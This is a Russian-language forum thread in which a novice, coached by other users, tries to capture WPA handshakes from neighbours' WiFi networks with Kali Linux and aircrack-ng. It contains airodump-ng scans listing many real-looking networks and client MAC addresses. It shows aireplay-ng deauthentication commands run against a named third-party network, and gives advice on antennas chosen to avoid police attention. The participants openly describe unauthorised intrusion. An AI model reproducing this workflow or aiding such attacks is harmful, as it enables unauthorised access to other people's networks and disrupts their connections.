02:2F:0F:AE:44:A9 2C:76:8A:02:AC:AB -63 0 - 1 38 3257
С 1 по (примерно) 15 подбирает, я зафиксировал 13. Так и должно быть?
WLAN0 отключен:
root@kali-Linux:~# ifconfig
eth0 Link encap:Ethernet HWaddr 28:d2:44:a9:92:6c
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:112 errors:0 dropped:0 overruns:0 frame:0
TX packets:112 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:6720 (6.5 KiB) TX bytes:6720 (6.5 KiB)
mon0 Link encap:UNSPEC HWaddr 9C-AD-97-4D-37-19-3A-30-00-00-00-00-00-00-00-00
UP BROADCAST NOTRAILERS RUNNING PROMISC ALLMULTI MTU:1500 Metric:1
RX packets:590118 errors:0 dropped:14140 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:122378467 (116.7 MiB) TX bytes:0 (0.0 B)
usb0 Link encap:Ethernet HWaddr 36:4b:50:b7:ef:2d
inet addr:192.168.0.182 Bcast:192.168.0.255 Mask:255.255.255.0
inet6 addr: fe80::344b:50ff:feb7:ef2d/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:19581 errors:0 dropped:0 overruns:0 frame:0
TX packets:19497 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:17222457 (16.4 MiB) TX bytes:2192415 (2.0 MiB)
Потому что в начале мониторинга этого не наблюдается:
CH 10 ][ Elapsed: 16 s ][ 2015-05-12 22:14
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
02:2F:0F:AE:44:A9 -1 0 130 0 0 10 11 OPN HP02ACAB
BSSID STATION PWR Rate Lost Frames Probe
02:2F:0F:AE:44:A9 2C:76:8A:02:AC:AB -67 0 - 1 19 130
Канал в ардампе выставляй фиксировано -c Х где Х - номер канала. так и в точках ориентироваться легче и качество сигнала понять можно,а когда адаптер постоянно сканирует сеть по всем каналам трудно оценить качество приема той или иной сети, бывает еще так, что ты видишь точку доступа а она тебя нет, тут надо навестись антенной для хорошего приема и передачи сигнала, ни в коем случае не повышать уровень излучаемой мощности твоего адаптера это неправильно просто будешь сильнее "срать" в эфир и все. Делай хорошую направленную антенну и в путь.
Василий-Шишкин
12.05.2015, 23:26
Канал в ардампе выставляй фиксировано -c Х где Х - номер канала. так и в точках ориентироваться легче и качество сигнала понять можно,а когда адаптер постоянно сканирует сеть по всем каналам трудно оценить качество приема той или иной сети, бывает еще так, что ты видишь точку доступа а она тебя нет, тут надо навестись антенной для хорошего приема и передачи сигнала, ни в коем случае не повышать уровень излучаемой мощности твоего адаптера это неправильно просто будешь сильнее "срать" в эфир и все. Делай хорошую направленную антенну и в путь.
Сколько могут стоить нормальные минеатюрные антены. И обязательно минеатюрные, я даже боюсь представить , что подумают люди, увидев меня с антеной с компом (ноутбуком) и с wifi адаптером, это же сразу в палицию позвонят.
Василий-Шишкин
12.05.2015, 23:27
Канал в ардампе выставляй фиксировано -c Х где Х - номер канала. так и в точках ориентироваться легче и качество сигнала понять можно,а когда адаптер постоянно сканирует сеть по всем каналам трудно оценить качество приема той или иной сети, бывает еще так, что ты видишь точку доступа а она тебя нет, тут надо навестись антенной для хорошего приема и передачи сигнала, ни в коем случае не повышать уровень излучаемой мощности твоего адаптера это неправильно просто будешь сильнее "срать" в эфир и все. Делай хорошую направленную антенну и в путь.
С каналом я так и делаю в левом верхнем углу его видно, он зафиксирован.
К 100, как это провернуть, у меня этот показатель равен 0, если я в правельной таблитце смотрю.
Если по таблице смотреть и по параметру PWR:
CH 12 ][ Elapsed: 8 s ][ 2015-05-12 22:20
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
D4:BF:7F:0F:A5:FD -73 2 0 0 5 54e WPA2 CCMP PSK onlime83
E8:BE:81:3E:46:09 -75 3 0 0 6 54e WPA CCMP PSK stream-51
BC:F6:85:44:A2:E6 -76 4 0 0 4 54e WPA CCMP PSK SEGUNDO
C2:9F:DB:57:A9:4F -67 8 0 0 6 54e. WPA2 CCMP PSK FODD
28:28:5D:6C:34:10 -71 15 0 0 4 54e WPA2 CCMP PSK H10372
28:C6:8E:5D:C1:6E -72 16 0 0 5 54e WPA2 CCMP PSK chuvanometers
02:2D:5D:BA:E1:B7 -1 22 0 0 10 11 . OPN HP01DEF2
02:29:59:05:A0:51 -1 37 0 0 10 11 . OPN HP01EE06
02:2F:0F:AE:44:A9 -1 50 0 0 10 11 OPN HP02ACAB
00:19:E1:00:E5:31 -57 33 0 0 10 54e. WPA2 CCMP MGT Beeline_WiFi_WPA
00:19:E1:00:E5:30 -58 35 0 0 10 54e. OPN Beeline_WiFi
E0:CE:C3:C7:D1:B3 -62 2 0 0 1 54e WPA2 CCMP PSK AKADO-D1AD
00:19:E1:FF:B2:71 -66 5 0 0 1 54e. WPA2 CCMP MGT Beeline_WiFi_WPA
00:19:E1:FF:B2:70 -64 5 0 0 1 54e. OPN Beeline_WiFi
D4:BF:7F:0B:EE:DC -65 29 0 0 2 54e WPA2 CCMP PSK onlime16
00:18:B0:EE:FD:01 -65 2 0 0 1 54e. WPA2 CCMP MGT Beeline_WiFi_WPA
68:94:23:D5:03:DC -65 23 0 0 6 54e. OPN HP-Print-DC-LaserJet 1102
90:94:E4:87:D8:90 -65 28 0 0 6 54e WPA2 CCMP PSK interaffairs1
00:19:E1:02:0B:91 -65 46 0 0 10 54e. WPA2 CCMP MGT Beeline_WiFi_WPA
00:19:E1:02:0B:90 -65 49 0 0 10 54e. OPN Beeline_WiFi
00:18:B0:EE:FD:00 -67 2 0 0 1 54e. OPN Beeline_WiFi
C0:70:09:F9:DB:98 -67 3 0 0 1 54e WPA2 CCMP PSK mgts15
00:19:E1:FF:B2:81 -69 52 0 0 10 54e. WPA2 CCMP MGT Beeline_WiFi_WPA
00:19:E1:FF:B2:80 -68 49 0 0 10 54e. OPN Beeline_WiFi
00:19:E1:01:11:B1 -69 35 0 0 10 54e. WPA2 CCMP MGT Beeline_WiFi_WPA
E0:CB:4E:6B:D1:B4 -69 29 0 0 11 54e WPA TKIP PSK fd57bb
00:19:E1:01:11:B0 -69 38 0 0 10 54e. OPN Beeline_WiFi
00:19:E1:00:58:71 -70 43 0 0 10 54e. WPA2 CCMP MGT Beeline_WiFi_WPA
58:23:8C:04:20:19 -71 8 0 0 6 54e WPA2 CCMP PSK Tech_D0003498
00:19:E1:00:A0:C0 -71 2 0 0 1 54e. OPN Beeline_WiFi
00:19:E1:02:4F:E1 -71 4 0 0 10 54e. WPA2 CCMP MGT Beeline_WiFi_WPA
00:19:E1:00:58:70 -72 37 0 0 10 54e. OPN Beeline_WiFi
D4:BF:7F:00:FB:6C -71 20 0 0 5 54e WPA2 CCMP PSK onlime
58:23:8C:81:AA:0B -73 3 0 0 1 54e WPA2 CCMP PSK Tech_D0022503
FC:75:16:01:7E:38 -71 8 0 0 11 54e. WPA2 CCMP PSK interaffairs1
C0:70:09:FA:80:6C -76 4 0 0 11 54e WPA2 CCMP PSK mgts73
00:19:E1:00:D5:41 -74 11 0 0 10 54e. WPA2 CCMP MGT Beeline_WiFi_WPA
00:19:E1:00:FD:71 -73 36 0 0 10 54e. WPA2 CCMP MGT Beeline_WiFi_WPA
00:19:E1:00:FD:70 -74 38 0 0 10 54e. OPN Beeline_WiFi
D4:BF:7F:00:A1:6C -75 3 0 0 13 54e WPA2 CCMP PSK onlime32
4C:5E:0C:BB:D6:17 -75 1 1 0 1 54e. WPA2 CCMP PSK AQUA-TORG
00:19:E1:01:08:E0 -76 27 0 0 10 54e. OPN Beeline_WiFi
C0:70:09:FA:63:78 -76 3 0 0 1 54e WPA2 CCMP PSK mgts69
00:1F:CE:4F:2F:9E -77 2 0 0 1 54e WPA2 CCMP PSK MY_MGTS
00:19:E1:01:08:E1 -77 28 0 0 10 54e. WPA2 CCMP MGT Beeline_WiFi_WPA
00:19:E1:00:D5:40 -74 29 0 0 10 54e. OPN Beeline_WiFi
BSSID STATION PWR Rate Lost Frames Probe
02:2D:5D:BA:E1:B7 2C:76:8A:01:DE:F2 -67 0 - 1 82 25 HP01DEF2
02:29:59:05:A0:51 2C:76:8A:01:EE:06 -63 0 - 1 69 37
02:2F:0F:AE:44:A9 2C:76:8A:02:AC:AB -71 0 - 1 62 50
то очень ладе не плохой.
К 100 должен стремится RXQ , этот столбец отображается только когда ты на конкретном канале, т.е. airodump-ng -c 1 mon0 -a, будет показаны точки 1-го кнала и качество их приема, мощность передачи это мощность передачи, она лишь говорит о том как близко к тебе сеть, но не о том сколько пакетов ты соберешь, сеть может быть и с высокой энергией а качество приема сигнало мало, т.е. многие пакеты теряются, при настройке линков иногда даже уменьшают излучаемую мощность чтобы повысить качество принимаемого сигнала.
Василий-Шишкин
12.05.2015, 23:34
К 100 должен стремится RXQ , этот столбец отображается только когда ты на конкретном канале, т.е. airodump-ng -C 1 mon0 -a, будет показаны точки 1-го кнала и качество их приема, мощность передачи это мощность передачи, она лишь говорит о том как близко к тебе сеть, но не о том сколько пакетов ты соберешь, сеть может быть и с высокой энергией а качество приема сигнало мало, т.е. многие пакеты теряются, при настройке линков иногда даже уменьшают излучаемую мощность чтобы повысить качество принимаемого сигнала.
т.е. увеличивая мощность сигнала, автоматически уменьшается качество приема и отдачи, получается надо искать такую называемую "Золотую середину"
У меня получается ловит сильный источник, а отдает он хреновасто?
т.е. увеличивая мощность сигнала, автоматически уменьшается качество приема и отдачи, получается надо искать такую называемую "Золотую середину"
У меня получается ловит сильный источник, а отдает он хреновасто?
Тут принцип мегафона (матюгальника) у тебя есть мегафон, я тебя слышу, у меня нет, ты меня не слышишь. Следовательно мы не можем обмениваться информацией, и установить обмен так как не можем договориться о рукопожатии (хендшейк). Наоборот тоже самое... Нужно искать токи или настраиваться антенной так чтобы и тебя и ты слышал и все будет оки. Еще бывает засада точку видно норм, а колиенты видны фигово... В общем смастери антенну с нормальным усилением и дело пойдет. Для начала советую двойной патч, он прост в изготовлении и дает неплохой прирост в усилении относительно пипеток, а там уже и сам поймешь что к чему.
Василий-Шишкин
12.05.2015, 23:40
К 100 должен стремится RXQ , этот столбец отображается только когда ты на конкретном канале, т.е. airodump-ng -C 1 mon0 -a, будет показаны точки 1-го кнала и качество их приема, мощность передачи это мощность передачи, она лишь говорит о том как близко к тебе сеть, но не о том сколько пакетов ты соберешь, сеть может быть и с высокой энергией а качество приема сигнало мало, т.е. многие пакеты теряются, при настройке линков иногда даже уменьшают излучаемую мощность чтобы повысить качество принимаемого сигнала.
Кстати, вот что выдала та команда:
CH 2 ][ Elapsed: 0 s ][ 2015-05-12 22:37
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:18:B0:EE:FD:01 -63 2 0 0 1 54e. WPA2 CCMP MGT Beeli
00:18:B0:EE:FD:00 -63 2 0 0 1 54e. OPN Beeli
02:29:59:05:A0:51 -1 2 0 0 10 11 . OPN HP01E
00:19:E1:00:58:71 -70 2 0 0 10 54e. WPA2 CCMP MGT Beeli
00:19:E1:FF:B2:71 -61 2 0 0 1 54e. WPA2 CCMP MGT Beeli
00:19:E1:FF:B2:70 -60 3 0 0 1 54e. OPN Beeli
D4:BF:7F:0B:EE:DC -60 4 0 0 2 54e WPA2 CCMP PSK onlim
00:19:E1:00:A0:C0 -72 2 0 0 1 54e. OPN Beeli
00:19:E1:00:2C:21 -59 2 0 0 1 54e. WPA2 CCMP MGT Beeli
00:19:E1:00:2C:20 -59 3 0 0 1 54e. OPN Beeli
00:19:E1:02:0B:90 -62 2 0 0 10 54e. OPN Beeli
00:19:E1:00:58:70 -70 3 0 0 10 54e. OPN Beeli
00:19:E1:02:4F:E1 -70 3 0 0 10 54e. WPA2 CCMP MGT Beeli
00:19:E1:02:4F:E0 -69 3 0 0 10 54e. OPN Beeli
00:19:E1:00:E5:31 -55 3 0 0 10 54e. WPA2 CCMP MGT Beeli
00:19:E1:00:E5:30 -55 3 0 0 10 54e. OPN Beeli
00:19:E1:00:D5:41 -75 2 0 0 10 54e. WPA2 CCMP MGT Beeli
E0:CE:C3:C7:D1:B3 -60 4 0 0 11 54e WPA2 CCMP PSK AKADO
В основном видно что наиболее частый канал 10, поэтому вибираю именно его
root@kali-Linux:~# airodump-ng -C 10 mon0 -a
Checking available frequencies, this could take few seconds.
Done.
No valid frequency given.
Только результат какой-то не такой, какой хотелось бы видеть.
Только результат какой-то не такой, какой хотелось бы видеть.
ошибся малосьть не стал исправлять, нужно вводить маленькую буку с вот так: airodump-ng -c 1 mon0 -a
Василий-Шишкин
12.05.2015, 23:43
Тут принцип мегафона (матюгальника) у тебя есть мегафон, я тебя слышу, у меня нет, ты меня не слышишь. Следовательно мы не можем обмениваться информацией, и установить обмен так как не можем договориться о рукопожатии (хендшейк). Наоборот тоже самое... Нужно искать токи или настраиваться антенной так чтобы и тебя и ты слышал и все будет оки. Еще бывает засада точку видно норм, а колиенты видны фигово... В общем смастери антенну с нормальным усилением и дело пойдет. Для начала советую двойной патч, он прост в изготовлении и дает неплохой прирост в усилении относительно пипеток, а там уже и сам поймешь что к чему.
То что сам пойму это было бы ну просто СУПЕР. А вот с антеной есть у вас ссылка на какую-нибудь хорошую так сказать проверенную?
Василий-Шишкин
12.05.2015, 23:46
ошибся малосьть не стал исправлять, нужно вводить маленькую буку с вот так: airodump-ng -c 1 mon0 -a
Да верно и я тоже просто скаптровал не проверев, да теперь сканируется:
CH 10 ][ Elapsed: 24 s ][ 2015-05-12 22:44 ][ fixed channel mon0: -1
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
02:2D:5D:BA:E1:B7 -1 0 127 0 0 10 11 . OPN HP01DEF2
------> 02:2F:0F:AE:44:A9 -1 0 153 0 0 10 11 OPN HP02ACAB
02:29:59:05:A0:51 -1 0 113 0 0 10 11 . OPN HP01EE06
00:19:E1:00:E5:31 -56 11 159 0 0 10 54e. WPA2 CCMP MGT Beeline_WiFi_WPA
00:19:E1:00:2C:20 -56 0 1 0 0 1 54e. OPN Beeline_WiFi
00:19:E1:00:E5:30 -56 11 157 0 0 10 54e. OPN Beeline_WiFi
E0:CE:C3:C7:D1:B3 -58 0 1 0 0 1 54e WPA2 CCMP PSK AKADO-D1AD
00:19:E1:01:11:B1 -61 24 127 0 0 10 54e. WPA2 CCMP MGT Beeline_WiFi_WPA
00:19:E1:00:2C:21 -60 0 2 0 0 1 54e. WPA2 CCMP MGT Beeline_WiFi_WPA
00:19:E1:01:11:B0 -62 28 139 0 0 10 54e. OPN Beeline_WiFi
90:94:E4:87:D8:90 -62 0 3 0 0 6 54e WPA2 CCMP PSK interaffairs1
00:18:B0:EE:FD:01 -63 0 0 0 0 1 54e. WPA2 CCMP MGT Beeline_WiFi_WPA
00:19:E1:FF:B2:71 -63 0 2 0 0 1 54e. WPA2 CCMP MGT Beeline_WiFi_WPA
00:19:E1:FF:B2:70 -64 0 2 0 0 1 54e. OPN Beeline_WiFi
D4:BF:7F:0B:EE:DC -65 0 2 0 0 2 54e WPA2 CCMP PSK onlime16
00:19:E1:02:4F:E1 -67 32 130 0 0 10 54e. WPA2 CCMP MGT Beeline_WiFi_WPA
00:19:E1:02:0B:90 -67 34 142 0 0 10 54e. OPN Beeline_WiFi
00:19:E1:FF:B2:80 -66 30 141 0 0 10 54e. OPN Beeline_WiFi
00:19:E1:FF:B2:81 -66 30 127 0 0 10 54e. WPA2 CCMP MGT Beeline_WiFi_WPA
00:19:E1:02:0B:91 -67 28 137 0 0 10 54e. WPA2 CCMP MGT Beeline_WiFi_WPA
28:C6:8E:5D:C1:6E -67 0 1 0 0 5 54e WPA2 CCMP PSK chuvanometers
58:23:8C:04:20:19 -67 0 2 0 0 6 54e WPA2 CCMP PSK Tech_D0003498
E0:CB:4E:6B:D1:B4 -67 10 116 0 0 11 54e WPA TKIP PSK fd57bb
00:19:E1:00:58:70 -69 7 149 0 0 10 54e. OPN Beeline_WiFi
00:19:E1:00:58:71 -67 28 142 0 0 10 54e. WPA2 CCMP MGT Beeline_WiFi_WPA
00:19:E1:02:4F:E0 -67 7 130 0 0 10 54e. OPN Beeline_WiFi
D4:BF:7F:00:A1:6C -68 0 1 0 0 13 54e WPA2 CCMP PSK onlime32
FC:75:16:01:7E:38 -69 0 8 0 0 11 54e. WPA2 CCMP PSK interaffairs1
E8:BE:81:3E:46:09 -69 0 1 0 0 6 54e WPA CCMP PSK stream-51
14:DA:E9:80:09:DC -73 39 100 0 0 8 54e WPA TKIP PSK Asus
00:19:E1:00:FD:71 -72 0 98 0 0 10 54e. WPA2 CCMP MGT Beeline_WiFi_WPA
00:19:E1:00:D5:41 -73 23 104 0 0 10 54e. WPA2 CCMP MGT Beeline_WiFi_WPA
00:19:E1:00:D5:40 -73 29 123 0 0 10 54e. OPN Beeline_WiFi
00:19:E1:00:FD:70 -73 0 120 0 0 10 54e. OPN Beeline_WiFi
58:6D:8F:A5:7C:33 -76 0 1 15 0 9 54e WPA2 CCMP PSK Sundukovy
BSSID STATION PWR Rate Lost Frames Probe
02:2D:5D:BA:E1:B7 2C:76:8A:01:DE:F2 -67 0 - 1 10 131 HP01DEF2
02:2F:0F:AE:44:A9 2C:76:8A:02:AC:AB -61 0 - 1 12 153
02:29:59:05:A0:51 2C:76:8A:01:EE:06 -57 0 - 1 23 121 HP01EE06
Получается я выбрал самый "говняный"?
Василий-Шишкин
12.05.2015, 23:49
Да все так и есть, но я тоже не просто выбрал с 1 по 3, ведь только на них есть клиенты, на других нету, а без клиентов я так понимаю шансов поймать хендшейк нету, так?
А сама антена нужна, чтобы услышать клиентов?
Ведь я думал не может же так быть, сегодня я ловил до 90 роутеров, 90 это три экрана 15-и дюймовых в полный размер, и не может же быть такого, что ни к одному нет клиетов? или я опять что-то путаю?
То что сам пойму это было бы ну просто СУПЕР. А вот с антеной есть у вас ссылка на какую-нибудь хорошую так сказать проверенную?
Вот простая и проверенная антенна, только при изготовлении антенн самое главное АККУРАТНОСТЬ. Размеры нужно стараться выдержать максимально близко к размерам в чертежах. http://www.lan23.ru/wifi/DPatch12/dp12.html и http://www.lan23.ru/forum/showthread.php?t=7995
Да все так и есть, но я тоже не просто выбрал с 1 по 3, ведь только на них есть клиенты, на других нету, а без клиентов я так понимаю шансов поймать хендшейк нету, так?
Хендшейк можно добывать самому отключая клиента и ловя повторную авторизацию клиента и можно ловит по принципу рыбалки: выставил антенну в окно и ждешь, часа за два три пара хендшейков точно свалится, ведь кто то подключается к сетям.
Василий-Шишкин
13.05.2015, 00:01
Хендшейк можно добывать самому отключая клиента и ловя повторную авторизацию клиента и можно ловит по принципу рыбалки: выставил антенну в окно и ждешь, часа за два три пара хендшейков точно свалится, ведь кто то подключается к сетям.
А если покупные антены, они как лучше или похуже (может они там из дешегого материала сделаны поэтому хуже), а "работаю" не дома не хочу вообще "палить", ментов еще натравят, всякое может быть, поэтому осторожно занимаюсь этим делом.
Василий-Шишкин
13.05.2015, 00:04
Хендшейк можно добывать самому отключая клиента и ловя повторную авторизацию клиента и можно ловит по принципу рыбалки: выставил антенну в окно и ждешь, часа за два три пара хендшейков точно свалится, ведь кто то подключается к сетям.
Да но я не могу же 50 окон с командой airodump-ng -a -d 02:2F:0F:AE:44:A9 -c 10 -w testcap mon0 открыть, получается я могу примерно за 2-3 наблюдать и пытаться их отключить, только как показывает практика я этого сдеалть не могу из-за этогой ошибки с отключением. то что мне пишет каждый раз 21:29:09 No such BSSID available. Мне надо ее как-то исправить. Может конечно с антеной получиться?
Василий-Шишкин
13.05.2015, 00:16
Думаю что вот этаантена подойдет: http://
Andrey9999
13.05.2015, 04:55
Василий-Шишкин, в крайнем случае можно усилить пипетку куском фольги (я себе из сока «Садочок» локатор сделал))
Согни на 90° и ~4 см от антенны
saldan061
13.05.2015, 08:39
Всем здрасьте )).Вопрос по Риверу.Выдает ошибку "wps transaction failed (code 0x2)".
Свисток тп-линк tl-wn722n,сборка BT5R3.Kali чет не ставится на флешку,был старый дистрибутив БТ.Прошел на ура,wep ломал с gerix-wifi.С ривером все время ошибка 0х2 или 0х3.Что это значит?
0х3 я так понимаю,блокируется WPS на точке.
Доброго времени суток!
Задумался над вопросом качества сигнала и потери в антенно-фидерном тракте из-за большой длинны фидера к антенне. Поэтому назрел вопрос, есть ли адаптеры (с режимом мониторинга и поддержкой kali), которые управляются и/или питаются по ethernet технологии? Чтобы задействовать utp кабель длинной около метров 200-300 (вывести на крышу), тем самым исключить потери в АФТ.
Доброго времени суток!
Задумался над вопросом качества сигнала и потери в антенно-фидерном тракте из-за большой длинны фидера к антенне. Поэтому назрел вопрос, есть ли адаптеры (с режимом мониторинга и поддержкой kali), которые управляются и/или питаются по ethernet технологии? Чтобы задействовать utp кабель длинной около метров 200-300 (вывести на крышу), тем самым исключить потери в АФТ.
Подойдут аппараты от Ubiquity например Bullet M2 (придется шить под OpenWRT). Но utp кабель ограничен по затуханию сигнала 100 метрами.
Можете как альтернативу рассмотреть активный usb кабель, но длинна конечно тоже не на 300 м.
Василий-Шишкин
13.05.2015, 18:19
Добрый день.
Как вы считаете какая антенна подойдёт для перехвата WiFi поролей, хендшейка и много другого интересного связанного с взломами с инетом. Есть какая-то разница между антеннами направленными и панельными?
Подойдут аппараты от Ubiquity например Bullet M2 (придется шить под OpenWRT). Но utp кабель ограничен по затуханию сигнала 100 метрами.
Можете как альтернативу рассмотреть активный usb кабель, но длинна конечно тоже не на 300 м.
Еще можно присмотреться к TP-Link WA5210G и TP-Link WA7510N, их кстати можно перепрошить в Ubiquit. Вот только питание по витой паре на 200-300 метров тоже проблемно, так как напряжение упадет ниже плинтуса, нужно тянуть витую пару а коробку power of ethernet ставить уже перед самой крышей(точкой доступа).
Добрый день.
Как вы считаете какая антенна подойдёт для перехвата WiFi поролей, хендшейка и много другого интересного связанного с взломами с инетом. Есть какая-то разница между антеннами направленными и панельными?
Панельная антенна, это одна из разновидностей направленных антенн. Антенну можно сделать просто и легко, главное постараться, ну если руки совсем не пригодны для напильника, то можно и купить антенну. Панельки для нашего дела отлично подходят.
Василий-Шишкин
13.05.2015, 22:42
Панельная антенна, это одна из разновидностей направленных антенн. Антенну можно сделать просто и легко, главное постараться, ну если руки совсем не пригодны для напильника, то можно и купить антенну. Панельки для нашего дела отлично подходят.
Добрый вечер.
А в чем вообще отличие антен? Как подобрать?
Все таки наверно вы правы без антены ни как не поймать хендшейк : Вот подтверждение
Так есть всё-таки решение проблемы с mon-интерфейсом в новом Aircrack-ng или нет? На сайте Kali Linux нашёл только:
https://forums.kali.org/showthread.php?25390-Installing-Aircrack-ng-1-2-rc2
с этим обновлением поотваливались всё программы
Добрый вечер.
А в чем вообще отличие антен? Как подобрать?
Все таки наверно вы правы без антены ни как не поймать хендшейк : Вот подтверждение
Антенны как автомобили, есть гоночные, есть грузовые, есть бизнесс-класс, есть для широких масс. Так и антенну нужно выбирать под задачу, нужен линк на 10-20 км, то это параболическое зеркало с двух сторон и точная настройка антенн друг на друга, нужен хак - панелька или незаметный патч, разведка местности - всенаправленный штырь. Для пробы можно попытаться сделать cantennu из нескафе или там тущенки какой... А так патчи для работы: на выезде - небольшой не привлекающий внимания патчик, для работы из дома дуал патч или квад патч.
Так есть всё-таки решение проблемы с mon-интерфейсом в новом Aircrack-ng или нет? На сайте Kali Linux нашёл только:
https://forums.kali.org/showthread.php?25390-Installing-Aircrack-ng-1-2-rc2
с этим обновлением поотваливались всё программы
А что не так то, можно поподробней?
Василий-Шишкин
13.05.2015, 23:34
Все верно. Сегодня антену не купил не было времени.
Пытаюсь с чем пока есть:
случайно нашел
CH 9 ][ Elapsed: 7 mins ][ 2015-05-13 22:30 ][ fixed channel mon0: 10
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
F8:C0:91:14:07:03 -45 97 3779 537 0 9 54e WPA CCMP PSK akado751
BSSID STATION PWR Rate Lost Frames Probe
F8:C0:91:14:07:03 C8:F7:33:50:5D:20 -64 0 - 6e 0 586
Проблема следующая все время фиксирует 10 канал, почему ifconfig wlan0 down не помогает, включаю, а через 10 сек снова появляется.
Хотя отключить вроде получилось:
root@kali-Linux:~# aireplay-ng mon0 -e akado751 -a F8:C0:91:14:07:03 -0 10 --ignore-negative-one
22:26:01 Waiting for beacon frame (BSSID: F8:C0:91:14:07:03) on channel 10
22:26:01 mon0 is on channel 10, but the AP uses channel 9
root@kali-Linux:~# aireplay-ng mon0 -e akado751 -a F8:C0:91:14:07:03 -0 10 --ignore-negative-one
22:33:41 Waiting for beacon frame (BSSID: F8:C0:91:14:07:03) on channel -1
NB: this attack is more effective when targeting
a connected wireless client (-c ).
22:33:41 Sending DeAuth to broadcast -- BSSID: [F8:C0:91:14:07:03]
22:33:42 Sending DeAuth to broadcast -- BSSID: [F8:C0:91:14:07:03]
22:33:42 Sending DeAuth to broadcast -- BSSID: [F8:C0:91:14:07:03]
22:33:43 Sending DeAuth to broadcast -- BSSID: [F8:C0:91:14:07:03]
22:33:44 Sending DeAuth to broadcast -- BSSID: [F8:C0:91:14:07:03]
22:33:44 Sending DeAuth to broadcast -- BSSID: [F8:C0:91:14:07:03]
22:33:45 Sending DeAuth to broadcast -- BSSID: [F8:C0:91:14:07:03]
22:33:45 Sending DeAuth to broadcast -- BSSID: [F8:C0:91:14:07:03]
22:33:46 Sending DeAuth to broadcast -- BSSID: [F8:C0:91:14:07:03]
22:33:46 Sending DeAuth to broadcast -- BSSID: [F8:C0:91:14:07:03]
Хотя не уверен.
А что не так то, можно поподробней?
Ну, например, все скрипты для перехвата handshake нужно теперь переписывать т.к интерфейса mon0 больше нету. Тот же feedingbottle/inflator с закрытыми исходниками, отвалились. Как тут кто-то сказал, это теперь такая "фича"
Ну, например, все скрипты для перехвата handshake нужно теперь переписывать т.к интерфейса mon0 больше нету. Тот же feedingbottle/inflator с закрытыми исходниками, отвалились.
Инфлятором не пользовался, а на счет скриптов передавал всегда как параметр интерфейс wlanX... А там уже как параметр можно использовать monX
На всякий случай не буду торопиться с обновлением аиркряка, или оно с обновлением кали прилетает?
Василий-Шишкин
13.05.2015, 23:39
Также проверял, вроде получилось там один раз перехватать, как написанов в статье на этом сайте провераю на наличие хендшейков:
root@kali-Linux:~# aircrack-ng /root/h12.pcap
Opening /root/h12.pcap
Read 3 packets.
# BSSID ESSID Encryption
1 F8:C0:91:14:07:03 akado751 WPA (0 handshake)
Choosing first network as target.
Opening /root/h12.pcap
Please specify a dictionary (option -w).
Quitting aircrack-ng...
Фиг тебе пишет что нету как так там есть ключи 1-4 и 3-4 почему так
На всякий случай не буду торопиться с обновлением аиркряка, или оно с обновлением кали прилетает?
Точно не подскажу, у меня Debian. Но на их форуме рекомендуют пока оставаться на старой версии. Я тоже оставлю 1.2 rc1 пока не будет найдено решение для rc2.
Все верно. Сегодня антену не купил не было времени.
Пытаюсь с чем пока есть:
случайно нашел
CH 9 ][ Elapsed: 7 mins ][ 2015-05-13 22:30 ][ fixed channel mon0: 10
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
F8:C0:91:14:07:03 -45 97 3779 537 0 9 54e WPA CCMP PSK akado751
BSSID STATION PWR Rate Lost Frames Probe
F8:C0:91:14:07:03 C8:F7:33:50:5D:20 -64 0 - 6e 0 586
Проблема следующая все время фиксирует 10 канал, почему ifconfig wlan0 down не помогает, включаю, а через 10 сек снова появляется.
Хотя отключить вроде получилось:
root@kali-Linux:~# aireplay-ng mon0 -e akado751 -a F8:C0:91:14:07:03 -0 10 --ignore-negative-one
22:26:01 Waiting for beacon frame (BSSID: F8:C0:91:14:07:03) on channel 10
22:26:01 mon0 is on channel 10, but the AP uses channel 9
root@kali-Linux:~# aireplay-ng mon0 -e akado751 -a F8:C0:91:14:07:03 -0 10 --ignore-negative-one
22:33:41 Waiting for beacon frame (BSSID: F8:C0:91:14:07:03) on channel -1
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
22:33:41 Sending DeAuth to broadcast -- BSSID: [F8:C0:91:14:07:03]
22:33:42 Sending DeAuth to broadcast -- BSSID: [F8:C0:91:14:07:03]
22:33:42 Sending DeAuth to broadcast -- BSSID: [F8:C0:91:14:07:03]
22:33:43 Sending DeAuth to broadcast -- BSSID: [F8:C0:91:14:07:03]
22:33:44 Sending DeAuth to broadcast -- BSSID: [F8:C0:91:14:07:03]
22:33:44 Sending DeAuth to broadcast -- BSSID: [F8:C0:91:14:07:03]
22:33:45 Sending DeAuth to broadcast -- BSSID: [F8:C0:91:14:07:03]
22:33:45 Sending DeAuth to broadcast -- BSSID: [F8:C0:91:14:07:03]
22:33:46 Sending DeAuth to broadcast -- BSSID: [F8:C0:91:14:07:03]
22:33:46 Sending DeAuth to broadcast -- BSSID: [F8:C0:91:14:07:03]
Хотя не уверен.
У тебя похоже NetworkManager не остановлен и он управляет сетью, попробуй в его настройках снять галку управлять сетью или дай команду:
airmon-ng check kill
Василий-Шишкин
13.05.2015, 23:57
У тебя похоже NetworkManager не остановлен и он управляет сетью, попробуй в его настройках снять галку управлять сетью или дай команду:
airmon-ng check kill
Да исправил, но вот теперь что то перехватывается, пакеты ключаей 1-4 и 3-4 когда провераю есть ли там хендшейк:
